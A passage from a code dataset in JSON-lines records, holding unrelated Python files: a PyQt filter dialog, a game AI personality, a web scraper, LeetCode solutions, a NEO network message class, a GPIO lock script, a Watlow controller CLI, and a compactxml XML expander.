text.isspace()) and (text != \"\")):\n self.meaningFilterPattern = repr(\n text)[1:-1]\n self.filterColumn = 1\n self.meaningFilterEnabled = True\n self.filterRegExpChanged()\n else:\n self.meaningFilterEnabled = False\n self.filterString = \"\"\n self.meaningFilterPattern = repr(\n self.filterString)[1:-1]\n self.filterRegExpChanged()\n\n def setTagFilter(self):\n text = self.tagFilter.text()\n if((text is not None) and (not text.isspace()) and (text != \"\")):\n self.tagFilterPattern = repr(\n text)[1:-1]\n self.filterColumn = 2\n self.tagFilterEnabled = True\n self.filterRegExpChanged()\n else:\n self.tagFilterEnabled = False\n self.filterString = \"\"\n self.tagFilterPattern = repr(\n self.filterString)[1:-1]\n self.filterRegExpChanged()\n\n def setClassificationFilter(self, text):\n \"\"\"\n Change the combo box value . 
Values represent the different file\n extensions.\n \"\"\"\n if(text != \"All\"):\n self.classificationFilterValue = text\n self.filterString = text\n self.classificationFilterPattern = repr(\n text)[1:-1]\n self.classificationFilterEnabled = True\n self.filterColumn = 3\n self.filterRegExpChanged()\n else:\n self.filterString = \"\"\n self.classificationFilterPattern = repr(\n self.filterString)[1:-1]\n self.filterColumn = 3\n self.classificationFilterEnabled = False\n self.filterRegExpChanged()\n\n def setSourceModel(self, model):\n # the proxy model points to a source model then we create to hold the actual data\n self.proxyModel.setSourceModel(model)\n self.sourceView.setModel(model)\n\n def filterRegExpChanged(self):\n syntax = QRegExp.RegExp # can be one of QRegExp.RegExp2, QRegExp.WildCard, QRegExp.RegExp2 etc, see https://doc.qt.io/qt-5/qregexp.html#PatternSyntax-enum\n caseSensitivity = Qt.CaseInsensitive\n regExp = QRegExp(self.filterString,\n caseSensitivity, syntax)\n # This property holds the QRegExp used to filter the contents of the source model\n self.proxyModel.setFilterKeyColumn(self.filterColumn)\n self.proxyModel.setFilterRegExp(regExp)\n\n @ property\n def selectedWord(self):\n return self._selectedWord\n\n @ selectedWord.setter\n def selectedWord(self, newWord):\n self._selectedWord = newWord\n # Reference: https://doc.qt.io/archives/qtjambi-4.5.2_01/com/trolltech/qt/qtjambi-customfilter.html\n","sub_path":"lyrical/beautifulWordSelectorDialog.py","file_name":"beautifulWordSelectorDialog.py","file_ext":"py","file_size_in_byte":15238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"284747911","text":"import random\n\nfrom core.ai import behaviors\nfrom core.ai.personalities import Personality\n\n\nclass WarzoneWarrior(Personality):\n @classmethod\n def get_behavior(cls, host, last_behavior, short_term_state):\n cls.seek_threats(host, short_term_state)\n if short_term_state.enemies:\n target_point = cls.get_closest_enemy_point(\n host, short_term_state.enemies)\n if target_point is not None:\n distance = target_point.manhattan_distance_to(host.location.point)\n if distance < 10:\n return cls.engage_immediate_enemies(\n host, target_point, distance, last_behavior)\n\n # return cls.walk_somewhere_or_continue(host, last_behavior)\n\n @classmethod\n def seek_threats(cls, host, short_term_state):\n unknown_objects = host.location.level.game_objects.difference(\n short_term_state.known_objects\n )\n for unknown_object in unknown_objects:\n cls.identify_relation(host, unknown_object, short_term_state)\n\n @classmethod\n def identify_relation(cls, host, game_object, short_term_state):\n if host is game_object:\n short_term_state.known_objects.add(host)\n return\n\n if host.alliance.is_enemy(game_object):\n short_term_state.add_enemy(game_object)\n\n @classmethod\n def engage_immediate_enemies(cls, host, target_point, distance, last_behavior):\n target_coordinate = (target_point.x, target_point.y)\n if distance <= 1:\n return behaviors.MeleeAttack(host, target_point)\n\n if isinstance(last_behavior, behaviors.Move):\n last_behavior.adjust_target_coordinates(target_coordinate)\n return last_behavior\n return behaviors.Move(host, target_coordinate)\n\n @classmethod\n def get_closest_enemy_point(cls, host, enemies):\n living_enemies = [\n enemy.location.point\n for enemy in enemies\n if enemy.health.dead is False\n ]\n if living_enemies:\n return host.location.point.get_closest_point(living_enemies)\n\n @classmethod\n def 
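Stripped of the dialog chrome, the filtering in filterRegExpChanged above reduces to a few proxy-model calls. A minimal self-contained sketch of the same mechanism (the sample words are illustrative):

from PyQt5.QtCore import Qt, QRegExp, QSortFilterProxyModel
from PyQt5.QtGui import QStandardItemModel, QStandardItem

source = QStandardItemModel(0, 1)
for word in ("serene", "sonorous", "mellifluous"):
    source.appendRow(QStandardItem(word))

proxy = QSortFilterProxyModel()
proxy.setSourceModel(source)
proxy.setFilterKeyColumn(0)
proxy.setFilterRegExp(QRegExp("^s", Qt.CaseInsensitive, QRegExp.RegExp))
print(proxy.rowCount())  # 2: only "serene" and "sonorous" survive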
walk_somewhere_or_continue(cls, host, last_behavior):\n if last_behavior and not last_behavior.finished:\n return last_behavior\n\n level = host.location.level\n target_coordinate = (\n random.randint(1, level.max_x),\n random.randint(1, level.max_y)\n )\n\n return behaviors.Move(host, target_coordinate)\n","sub_path":"bfgame/ai/personalities/warzone.py","file_name":"warzone.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"320597429","text":"from helper import multi_request\nfrom urllib.parse import quote\nimport requests\nfrom lxml import html\n\n\nclass DatSemShift:\n cached_request = None\n source_phrases = []\n target_phrases = []\n\n def populate_sources(self):\n if self.cached_request == None:\n r = requests.get(\"http://datsemshift.ru/search\")\n self.cached_request = html.fromstring(r.content)\n self.source_phrases = self.cached_request.xpath('//*[@id=\"source\"]/option/text()')\n\n def populate_targets(self):\n if self.cached_request == None:\n r = requests.get(\"http://datsemshift.ru/search\")\n self.cached_request = html.fromstring(r.content)\n self.target_phrases = self.cached_request.xpath('//*[@id=\"target\"]/option/text()')\n\n def semshift(self, search_term):\n if len(self.source_phrases) == 0:\n self.populate_sources()\n urls = [f'http://datsemshift.ru/search?source={quote(input)}'\n for input in self.source_phrases if search_term in input]\n\n results = multi_request(urls)\n\n meanings = [item for sublist in\n [html.fromstring(r.content).xpath('/html/body/main/div/table/tr/td[5]/text()') for r in results]\n for item in sublist if item != 'Meaning 2']\n\n return meanings\n\n def reverse(self, search_term):\n if len(self.target_phrases) == 0:\n self.populate_targets()\n urls = [f'http://datsemshift.ru/search?target={quote(input)}'\n for input in self.target_phrases if search_term in input]\n\n results = multi_request(urls)\n\n meanings = [item for sublist in\n [html.fromstring(r.content).xpath('/html/body/main/div/table/tr/td[3]/text()') for r in results]\n for item in sublist if item != 'Meaning 1']\n\n return meanings\n","sub_path":"datsemshift.py","file_name":"datsemshift.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"409318952","text":"# https://leetcode.com/explore/interview/card/top-interview-questions-easy/92/array/727/\n# https://leetcode.com/problems/remove-duplicates-from-sorted-array/description/\n\n# Remove Duplicates from Sorted Array\n#\n# Given a sorted array nums, remove the duplicates in-place such that\n# each element appear only once and return the new length.\n\nimport unittest\n\n\nclass Solution:\n\n # Note: 2 pointer one pass copy solution.\n #\n # grow 2 region like qs partition.\n #\n # i (slow) starts with 1st element, j starts with 2nd element.\n # if A[i] and A[j] is different, increment i, and copy j to i.\n #\n # in essence, j is the frontier, whenever we encounter an element\n # that is different from our tail in smaller set, we add it to the\n # tail of our smaller set.\n #\n # since array is sorted, this will automatically ignore any\n # duplicates when A[i] == A[j]\n\n def removeDuplicates(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n return self.remove_dup2(nums)\n\n # simpler loop, from solution.\n # 161 / 161 test cases passed.\n # Status: Accepted\n # Runtime: 104 ms (beats 22.04% of py3)\n def remove_dup2(self, 
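The multi_request helper imported by the DatSemShift scraper above is not shown; given how it is used (a list of URLs in, a list of responses out), a plausible thread-pool implementation would be:

import concurrent.futures
import requests

def multi_request(urls, max_workers=8):
    # Fetch all URLs concurrently and return responses in input order.
    with concurrent.futures.ThreadPoolExecutor(max_workers) as pool:
        return list(pool.map(requests.get, urls))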
A):\n\n n = len(A)\n if n < 2:\n return n\n\n i = 0\n for j in range(1, n):\n if A[i] != A[j]:\n i += 1\n A[i] = A[j]\n\n return i+1\n\n # my version\n # use 2 pointers. i, left side, target, and j, right side, source.\n # advance j until next char is different (so j points to last\n # occurrence of current char), then copy j to i. increment both i &\n # j and repeat.\n def remove_dup(self, A):\n n = len(A)\n i = 0\n j = 0\n while j < n:\n A[i] = A[j] # copy j to i\n while j+1 < n and A[j] == A[j + 1]: # advance j while same\n j += 1\n i += 1\n j += 1\n return i\n\n\nclass TestRemoveDup(unittest.TestCase):\n\n def setUp(self):\n self.sol = Solution()\n\n def test1(self):\n A = [1, 2, 3, 4]\n v = self.sol.removeDuplicates(A)\n self.assertEqual(A[:v], [1, 2, 3, 4])\n\n def test2(self):\n A = [1, 2, 2, 2, 3, 4, 4, 4]\n v = self.sol.removeDuplicates(A)\n self.assertEqual(A[:v], [1, 2, 3, 4])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"leetcode/1-easy/1-array/1-removedup/remove_dup.py","file_name":"remove_dup.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"654487453","text":"from neo.IO.Mixins import SerializableMixin\nfrom neo.IO.BinaryReader import BinaryReader\nfrom neo.IO.BinaryWriter import BinaryWriter\nfrom neo.IO.MemoryStream import MemoryStream\nfrom neo import Settings\nfrom neo.Core.Helper import Helper\nfrom neo.Cryptography.Helper import *\nimport ctypes\nimport asyncio\nimport binascii\nfrom autologging import logged\n\n@logged\nclass Message(SerializableMixin):\n\n\n PayloadMaxSize = b'\\x02000000'\n PayloadMaxSizeInt = int.from_bytes(PayloadMaxSize, 'big')\n\n Magic = None\n\n Command = None\n\n Checksum = None\n\n Payload = None\n\n\n def __init__(self, command=None, payload = None):\n\n self.Command = command\n self.Magic = Settings.MAGIC\n\n if payload is None:\n payload = bytearray()\n else:\n payload = binascii.unhexlify( Helper.ToArray(payload))\n\n self.Checksum = Message.GetChecksum(payload)\n self.Payload = payload\n\n def Size(self):\n return ctypes.sizeof(ctypes.c_uint) + 12 + ctypes.sizeof(ctypes.c_int) + ctypes.sizeof(ctypes.c_uint) + len(self.Payload)\n\n def Deserialize(self, reader):\n if reader.ReadUInt32() != self.Magic:\n raise Exception(\"Invalid format, wrong magic\")\n\n self.Command = reader.ReadFixedString(12).decode('utf-8')\n\n length = reader.ReadUInt32()\n\n if length > self.PayloadMaxSizeInt:\n raise Exception(\"invalid format- payload too large\")\n\n self.Checksum = reader.ReadUInt32()\n\n self.Payload = reader.ReadBytes(length)\n\n\n if not Message.GetChecksum(self.Payload) == self.Checksum:\n raise Exception(\"checksum mismatch\")\n\n self.__log.debug(\"Deserialized Message %s \" % self.Command)\n\n @staticmethod\n def DeserializeFromAsyncStream(stream, cancellation_token):\n\n buffer = bytearray(24)\n\n raise NotImplementedError()\n\n\n @staticmethod\n def DeserializeFromAsyncSocket(socket, cancellation_token):\n buffer = bytearray(24)\n\n try:\n socket.recv_into(buffer, 24)\n\n ms = MemoryStream(buffer)\n reader = BinaryReader(ms)\n\n message = Message()\n\n message.Magic = reader.ReadUInt32()\n message.Command = reader.ReadFixedString(12).decode('utf-8')\n\n length = reader.ReadUInt32()\n\n if length > Message.PayloadMaxSizeInt:\n raise Exception(\"format too big\")\n\n message.Checksum = reader.ReadUInt32()\n\n message.Payload = bytearray(length)\n\n if length > 0:\n message.Payload = Message.FillBufferAsyncStream(socket, 
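A short trace of remove_dup2 on A = [1, 2, 2, 3] makes the two-pointer invariant concrete: A[0..i] always holds the deduplicated prefix.

# j=1: A[0] != A[1] -> i=1, A stays [1, 2, 2, 3]
# j=2: A[1] == A[2] -> duplicate, skip
# j=3: A[1] != A[3] -> i=2, A becomes [1, 2, 3, 3]
# return i + 1 = 3, so A[:3] == [1, 2, 3]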
length, None)\n\n            checksum = Message.GetChecksum(message.Payload)\n\n            if checksum != message.Checksum:\n\n                print(\"Message command :%s \" % message.Command)\n                print(\"Checksum mismatch: %s \" % message.Checksum)\n                print(\"message payload: %s \" % message.Payload)\n\n                raise Exception(\"invalid checksum\")\n\n            return message\n\n        except Exception as e:\n            print(\"could not receive buffer from socket: %s \" % e)\n\n\n\n\n\n    @staticmethod\n    def FillBufferAsyncStream(stream, length, cancellation_token):\n        chunks = []\n        bytes_received = 0\n\n        while bytes_received < length:\n            chunk = stream.recv(min(length - bytes_received, 1024))\n            if chunk == b'':\n                raise Exception('Socket connection broken')\n            chunks.append(chunk)\n            bytes_received = bytes_received + len(chunk)\n\n        return b''.join(chunks)\n\n    @staticmethod\n    async def FillBufferAsyncSocket(socket, buffer, cancellation_token):\n        raise NotImplementedError()\n\n\n\n    @staticmethod\n    def GetChecksum(value):\n\n        uint32 = bin_dbl_sha256(value)[:4]\n\n        return int.from_bytes(uint32, 'little')\n\n\n\n    def Serialize(self, writer):\n\n        writer.WriteUInt32(self.Magic)\n        writer.WriteFixedString(self.Command, 12)\n        writer.WriteUInt32(len(self.Payload))\n        writer.WriteUInt32(self.Checksum)\n        writer.WriteBytes(self.Payload)\n\n","sub_path":"neo/Network/Message.py","file_name":"Message.py","file_ext":"py","file_size_in_byte":4095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} {"seq_id":"623290633","text":"# Valid parentheses\n# Problem description\n# A string of brackets is correctly paired when every '(' that opens is matched by a closing ')'. For example:\n\n# ()() and (())() are valid parentheses.\n# )()( and (()( are not valid parentheses.\n# Given a string s consisting only of '(' and ')', complete the solution function so that it\n# returns true if s is a valid parenthesis string and false otherwise.\n\ndef solution(s):\n    answer = True\n    stack = []\n    for i in s:\n        if i == \"(\":\n            stack.append(i)\n        elif i == \")\":\n            if len(stack) == 0 or stack[-1] == \")\":\n                answer = False\n                break\n            else:\n                stack.pop()\n    if len(stack) != 0:\n        answer = False\n    return answer\n\n# def is_pair(s):\n#     st = list()\n#     for c in s:\n#         if c == '(':\n#             st.append(c)\n\n#         if c == ')':\n#             try:\n#                 st.pop()\n#             except IndexError:\n#                 return False\n\n#     return len(st) == 0\n","sub_path":"programmers/level_2/right_bracket.py","file_name":"right_bracket.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} {"seq_id":"183823523","text":"#LEGACY CODE ONLY FOR FUTURE REFERENCE\n\nimport RPi.GPIO as GPIO\nimport time\nfrom sys import argv\n\nGPIO.setmode(GPIO.BCM)\nlockPin = 18\n\ndef unlock():\n    GPIO.setup(lockPin, GPIO.OUT)\n    GPIO.output(lockPin, True)\n    time.sleep(0.3)\n    GPIO.output(lockPin, False)\n    GPIO.cleanup([lockPin])\n\nif len(argv) > 1:\n    unlock()\n","sub_path":"Server/Legacy/lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} {"seq_id":"79089178","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04)\n# [GCC 8.4.0]\n# Embedded file name: /Users/jamesjeffryes/Documents/NuMat/watlow/build/lib/watlow/__init__.py\n# Compiled at: 2020-02-20 16:03:43\n# Size of source mod 2**32: 1439 bytes\n\"\"\"Python driver for Watlow EZ-Zone temperature controllers.\n\nDistributed under the GNU General Public License v2\nCopyright (C) 2019 NuMat Technologies\n\"\"\"\nfrom watlow.driver import TemperatureController, 
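GetChecksum in Message.py above takes the first four bytes of a double SHA-256 digest, read little-endian. bin_dbl_sha256 comes from neo's crypto helpers, but the same value can be computed with only the standard library:

import hashlib

def get_checksum(payload: bytes) -> int:
    # SHA-256 applied twice, then the first 4 bytes as a little-endian int.
    digest = hashlib.sha256(hashlib.sha256(payload).digest()).digest()
    return int.from_bytes(digest[:4], 'little')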
Gateway\nfrom watlow import mock\n\ndef command_line():\n \"\"\"CLI interface, accessible when installed through pip.\"\"\"\n import argparse, json\n parser = argparse.ArgumentParser(description='Control a Watlow temperature controller or gateway from the command line.')\n parser.add_argument('port', nargs='?', default='/dev/ttyUSB0', help=\"The target serial port or TCP address. Default '/dev/ttyUSB0'.\")\n parser.add_argument('--set-setpoint', '-f', default=None, type=float, help='Sets the setpoint temperature.')\n parser.add_argument('--zone', '-z', default=None, type=int, help='Specify zone in case of gateway')\n args = parser.parse_args()\n if args.zone:\n gateway = Gateway(args.port)\n temperature_controller = TemperatureController(port=(args.port))\n try:\n if args.set_setpoint:\n temperature_controller.set(args.set_setpoint)\n state = temperature_controller.get()\n print(json.dumps(state, indent=2, sort_keys=True))\n finally:\n temperature_controller.close()\n\n\nif __name__ == '__main__':\n command_line()","sub_path":"pycfiles/watlow-0.2.1-py2.py3-none-any/__init__.cpython-37.py","file_name":"__init__.cpython-37.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"443806478","text":"# import sys\n# import os\n# import numpy as np\nimport regression\nimport ipdb\n#ipdb.set_trace()\n\nn = 100\nw1 = 2\nw0 = 1\ne = 0.8\nfilename = 'regression-'+str(n)+'-'+str(w1)+'-'+str(w0)+'-'+str(e)\nx, y = regression.generate_data(n, w1, w0, e, filename+'.txt')\n# x,y = regression.read_data(filename+'.txt')\nregression.plot_data_with_line(x, y, w1, w0, filename+'.png')\npoints = 100\noffset = 50\nscale = 0.1\nnpower = 2\nsteps = 20\nrate = .675\nrate_decay = .99\n#ipdb.set_trace()\n(landscape, minw1, minw0, mindev) = \\\n regression.generate_landscape(x, y,\n points, offset, scale, npower)\nregression.plot_landscape(landscape, minw1, minw0, mindev, w1, w0, points, offset, scale, -1, [], [], filename+'-L'+str(npower)+'.png')\n(w1_gd,w0_gd)=regression.gradient_descent(x,y,landscape,points,offset,scale,-4.9,0.5,rate,rate_decay,steps)\nfor i in range(0,steps+1,5):\n\tregression.plot_landscape(landscape,minw1,minw0,mindev,w1,w0,points,offset,scale,i,w1_gd,w0_gd,filename+'-landscape-L'+str(npower)+'-decay'+str(rate_decay)+'-rate'+str(rate)+'-'+str(i)+'.png')\n\tregression.plot_data_with_line(x,y,w1_gd[i],w0_gd[i],filename+'-L'+str(npower)+'-decay'+str(rate_decay)+'-rate'+str(rate)+'-'+str(i)+'.png')\n","sub_path":"regression_main.py","file_name":"regression_main.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"652809851","text":"\"\"\"\nWrite a function called stop_at_four that iterates through a list of \nnumbers. Using a while loop, append each number to a new list until \nthe number 4 appears. 
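The rate and rate_decay values passed to gradient_descent in regression_main.py imply a step size that shrinks geometrically each iteration. On a toy quadratic loss the update looks like this (illustrative sketch, not the regression module's actual code):

rate, rate_decay = 0.675, 0.99
w = 5.0
for step in range(20):
    grad = 2 * (w - 2.0)   # gradient of the toy loss (w - 2)**2
    w -= rate * grad
    rate *= rate_decay     # geometric learning-rate decay
print(round(w, 4))         # converges toward the minimum at w = 2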
The function should return the new list.\n\"\"\"\n\ndef stop_at_four(my_list):\n \"\"\"function to stop at a specific value\"\"\"\n \n new_list = []\n count = 0\n \n while (count < len(my_list)) and (my_list[count] != 4):\n new_list.append(my_list[count])\n count +=1\n \n return new_list\n\nprint(stop_at_four([1,2,3,5,6,4]))\n\n","sub_path":"week4/exe3.py","file_name":"exe3.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"44572907","text":"words = ['sadfsd','asdgasdf','asdfsdf',\\\n 'asdfasdf','grt', 'sdfgsdfhshrt']\nlis = []\n\nwords.sort(key = lambda x : len(x), reverse = True)\nprint(words)\n# for word in words:\n# lis.append((len(word),word))\n# lis.sort(reverse = True)\n# res = []\n#\n# for length, word in lis:\n# res.append(word)\n#\n# print(res)\n","sub_path":"basc/tuple_DSU.py","file_name":"tuple_DSU.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"104989046","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/compactxml/expand.py\n# Compiled at: 2010-10-25 17:17:52\nfrom __future__ import absolute_import\nimport re, copy\nfrom lxml import etree\nimport pyparsing\nfrom .namespace import Namespaces, UndefinedPrefix\nfrom .variable import Variables\nfrom .macro import Macros\nfrom .expression import Expression, NamedExpression\nfrom .error import ExpandError\nfrom .grammar import create_grammar\nfrom .parser import Parser\n\nclass NamespaceLookahead(Parser):\n\n def parse(self, scope, aNamespaces, aVariables, aMacros):\n self.aNamespaces = copy.copy(aNamespaces)\n Parser.parse(self, scope, self.aNamespaces, aVariables, aMacros)\n return self.aNamespaces\n\n def attribute(self, statement, aNamespaces, aVariables, aMacros):\n try:\n name, value = self.parse_attribute(statement, aNamespaces, aVariables, aMacros)\n except UndefinedPrefix:\n pass\n\n if aNamespaces.is_namespace_name(name):\n if value is None:\n value = aVariables.default\n self.aNamespaces[None] = value\n elif aNamespaces.is_namespace_prefix(name):\n if value is None:\n value = aVariables.default\n self.aNamespaces[name.localname] = value\n return\n\n def namespace(self, statement, aNamespaces, aVariables, aMacros):\n prefix, value = self.parse_namespace(statement, aNamespaces, aVariables, aMacros)\n self.aNamespaces[prefix] = value\n\n\nclass AttributeLookahead(Parser):\n\n def parse(self, scope, aNamespaces, aVariables, aMacros):\n self.aAttributes = {}\n Parser.parse(self, scope, aNamespaces, aVariables, aMacros)\n return self.aAttributes\n\n def attribute(self, statement, aNamespaces, aVariables, aMacros):\n name, value = self.parse_attribute(statement, aNamespaces, aVariables, aMacros)\n if value is None:\n value = aVariables.default\n if not (aNamespaces.is_namespace_name(name) or aNamespaces.is_namespace_prefix(name)):\n self.aAttributes[name] = value\n return\n\n\nclass DefinitionLookahead(Parser):\n\n def parse(self, scope, aNamespaces, aVariables, aMacros):\n self.aParameters = []\n self.aElements = []\n Parser.parse(self, scope, aNamespaces, aVariables, aMacros)\n return (\n self.aParameters, self.aElements)\n\n def attribute(self, statement, aNamespaces, aVariables, aMacros):\n name, value = self.parse_attribute(statement, aNamespaces, aVariables, 
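itertools provides the same stop-at-sentinel behavior as the while loop above, without manual index bookkeeping:

from itertools import takewhile

print(list(takewhile(lambda x: x != 4, [1, 2, 3, 5, 6, 4])))  # [1, 2, 3, 5, 6]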
aMacros)\n self.aParameters.append((name, value))\n\n def default(self, statement, aNamespaces, aVariables, aMacros):\n self.aElements.append(statement)\n\n\nclass ExpansionLookahead(Parser):\n\n class UndefinedPositionalParameter(IndexError):\n\n def __init__(self, cPositional):\n self.cPositional = cPositional\n IndexError.__init__(self, str(self))\n\n def __str__(self):\n return 'More positional parameters given than the %d defined.' % self.cPositional\n\n def parse(self, scope, aNamespaces, aVariables, aMacros, aParameters, expansionSource):\n self.aParametersLookup = dict((name, value) for name, value in aParameters)\n self.aPositional = []\n self.aNamed = {}\n self.aContents = []\n Parser.parse(self, scope, aNamespaces, aVariables, aMacros)\n aPositionalNames = [ name for name, value in aParameters if name not in self.aNamed ]\n cPositional = len(aPositionalNames)\n for ePositional in self.aPositional:\n try:\n name = aPositionalNames.pop(0)\n except IndexError:\n raise self.UndefinedPositionalParameter(cPositional)\n\n self.aNamed[name] = ePositional\n\n for name in aPositionalNames:\n value = self.aParametersLookup[name]\n if value is not None:\n self.aNamed[name] = value\n\n aVariables = aVariables.new_scope(self.aNamed, expansionSource)\n aVariables.contents = self.aContents\n return aVariables\n\n def attribute(self, statement, aNamespaces, aVariables, aMacros):\n expression = NamedExpression(statement[2:], aNamespaces, aVariables)\n name = expression.name()\n value = expression.value()\n if name in self.aParametersLookup:\n if value is None:\n value = self.aParametersLookup[name]\n if value is None:\n value = aVariables.default\n self.aNamed[name] = value\n else:\n self.aContents.append(statement)\n return\n\n def positional(self, statement, aNamespaces, aVariables, aMacros):\n value = Expression(statement[2], aNamespaces, aVariables).value()\n self.aPositional.append(value)\n\n def default(self, statement, aNamespaces, aVariables, aMacros):\n self.aContents.append(statement)\n\n\nclass BodyParser(Parser):\n\n def parse(self, scope, aNamespaces, aVariables, aMacros, tree):\n self.aCreated = []\n Parser.parse(self, scope, aNamespaces, aVariables, aMacros, tree)\n return self.aCreated\n\n def element(self, statement, aNamespaces, aVariables, aMacros, tree):\n aElementNamespaces = NamespaceLookahead().parse(statement[3:], aNamespaces, aVariables, aMacros)\n aAttributes = AttributeLookahead().parse(statement[3:], aElementNamespaces, aVariables, aMacros)\n name = Expression(statement[2], aElementNamespaces, aVariables).qname()\n tree.start(name, aAttributes, nsmap=aElementNamespaces.nsmap())\n BodyParser().parse(statement[3:], aElementNamespaces, aVariables, aMacros, tree)\n self.aCreated.append(tree.end(name))\n\n def element_expansion(self, statement, aNamespaces, aVariables, aMacros, tree):\n name = Expression(statement[2], aNamespaces, aVariables).name()\n aDefinedParameters, aElements, expansionSource = aMacros.element(name)\n try:\n aExpansionVariables = ExpansionLookahead().parse(statement[3:], aNamespaces, aVariables, aMacros, aDefinedParameters, expansionSource)\n aCreatedInNestedScope = BodyParser().parse(aElements, aNamespaces, aExpansionVariables, aMacros, tree)\n except ExpansionLookahead.UndefinedPositionalParameter as exception:\n raise ExpandError(unicode(exception), exception)\n except ExpandError as exception:\n exception.bind_name(name)\n exception.bind_source(expansionSource)\n raise\n\n self.aCreated.extend(aCreatedInNestedScope)\n\n def text(self, statement, 
aNamespaces, aVariables, aMacros, tree):\n value = Expression(statement[2], aNamespaces, aVariables).value()\n tree.data(value)\n\n def comment(self, statement, aNamespaces, aVariables, aMacros, tree):\n value = Expression(statement[2], aNamespaces, aVariables).value()\n self.aCreated.append(tree.comment(value))\n\n def processing_instruction(self, statement, aNamespaces, aVariables, aMacros, tree):\n namedExpression = NamedExpression(statement[2:], aNamespaces, aVariables)\n name = namedExpression.prefix()\n value = namedExpression.value()\n self.aCreated.append(tree.pi(name, value))\n\n def attribute_default(self, statement, aNamespaces, aVariables, aMacros, tree):\n default = Expression(statement[3], aNamespaces, aVariables).value()\n aVariables.default = default\n\n def variable(self, statement, aNamespaces, aVariables, aMacros, tree):\n variableExpression = NamedExpression(statement[3:], aNamespaces, aVariables)\n name = variableExpression.name()\n value = variableExpression.value()\n if value is None:\n value = ''\n aVariables.set_global(name, value)\n return\n\n\nclass TopParser(BodyParser):\n\n def parse(self, scope, aNamespaces, aVariables, aMacros, tree):\n self.documentType = None\n aCreated = BodyParser.parse(self, scope, aNamespaces, aVariables, aMacros, tree)\n return (\n self.documentType, aCreated)\n\n def doctype(self, statement, aNamespaces, aVariables, aMacros, tree):\n self.documentType = Expression(statement[3], aNamespaces, aVariables).value()\n\n def load(self, statement, aNamespaces, aVariables, aMacros, tree):\n location = Expression(statement[3], aNamespaces, aVariables).value()\n from . import resolve\n resolved = resolve(location)\n assert isinstance(resolved, basestring)\n aNewMacros = load_macros(resolved, aNamespaces.nsmap(), aVariables.aGlobals, aMacros)\n aMacros.update(aNewMacros)\n\n def encoding(self, statement, aNamespaces, aVariables, aMacros, tree):\n encoding = Expression(statement[3], aNamespaces, aVariables).value()\n aVariables.encoding = encoding\n\n def attribute_definition(self, statement, aNamespaces, aVariables, aMacros, tree):\n name = Expression(statement[3], aNamespaces, aVariables).name()\n aMacros.add_attribute(name, statement[4:], aVariables.source)\n\n def element_definition(self, statement, aNamespaces, aVariables, aMacros, tree):\n name = Expression(statement[3], aNamespaces, aVariables).name()\n aParameters, aElements = DefinitionLookahead().parse(statement[4:], aNamespaces, aVariables, aMacros)\n aMacros.add_element(name, aParameters, aElements, aVariables.source)\n\n def default(self, statement, aNamespaces, aVariables, aMacros, tree):\n raise NotImplementedError(statement)\n\n\nclass LoadParser(Parser):\n\n def variable(self, statement, aNamespaces, aVariables, aMacros):\n variableExpression = NamedExpression(statement[3:], aNamespaces, aVariables)\n name = variableExpression.name()\n value = variableExpression.value()\n if value is None:\n value = ''\n aVariables.set_global(name, value)\n return\n\n def attribute_definition(self, statement, aNamespaces, aVariables, aMacros):\n name = Expression(statement[3], aNamespaces, aVariables).name()\n aMacros.add_attribute(name, statement[4:], aVariables.source)\n\n def element_definition(self, statement, aNamespaces, aVariables, aMacros):\n name = Expression(statement[3], aNamespaces, aVariables).name()\n aParameters, aElements = DefinitionLookahead().parse(statement[4:], aNamespaces, aVariables, aMacros)\n aMacros.add_element(name, aParameters, aElements, aVariables.source)\n\n\ndef 
setup(compacted, namespaces, variables, macros):\n grammar = create_grammar()\n try:\n parsed = grammar.parseString(compacted, True)\n except pyparsing.ParseException as exception:\n error = ExpandError(exception.msg, exception)\n error.bind_location(exception.loc)\n error.bind_source(compacted)\n raise error\n\n aMacros = Macros() if macros is None else copy.copy(macros)\n aVariables = Variables(variables).new_scope({}, compacted)\n aNamespaces = Namespaces(namespaces)\n return (\n parsed, aMacros, aVariables, aNamespaces)\n\n\ndef load_macros(compacted, namespaces={}, variables={}, macros=None):\n parsed, aMacros, aVariables, aNamespaces = setup(compacted, namespaces, variables, macros)\n try:\n LoadParser().parse(parsed, aNamespaces, aVariables, aMacros)\n except ExpandError as exception:\n exception.bind_source(compacted)\n raise\n\n return aMacros\n\n\ndef expand(compacted, namespaces={}, variables={}, macros=None):\n parsed, aMacros, aVariables, aNamespaces = setup(compacted, namespaces, variables, macros)\n tree = etree.TreeBuilder()\n try:\n documentType, aCreated = TopParser().parse(parsed, aNamespaces, aVariables, aMacros, tree)\n except ExpandError as exception:\n exception.bind_source(compacted)\n raise\n\n lastElement = 